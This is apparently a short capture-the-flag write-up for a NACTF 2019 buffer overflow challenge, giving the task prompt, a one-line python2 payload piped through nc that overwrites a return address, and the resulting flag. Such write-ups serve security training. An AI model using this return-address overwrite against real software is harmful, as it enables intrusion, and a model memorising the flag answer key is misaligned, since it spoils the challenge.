ctftime

My solutions for various CTF challenges

View on GitHub

BufferOverflow #1

Binary Exploitation - Points: 200

The close cousin of a website for “Question marked as duplicate” - part 2!

Can you redirect code execution and get the flag?

Connect at shell.2019.nactf.com:31462

bufover-1.c

bufover-1

$ python2 -c 'print("A"*28+"\xb2\x91\x04\x08")' | nc ingress.cluster.nactf.com 31462

flag: nactf{pwn_31p_0n_r3t_iNylg281}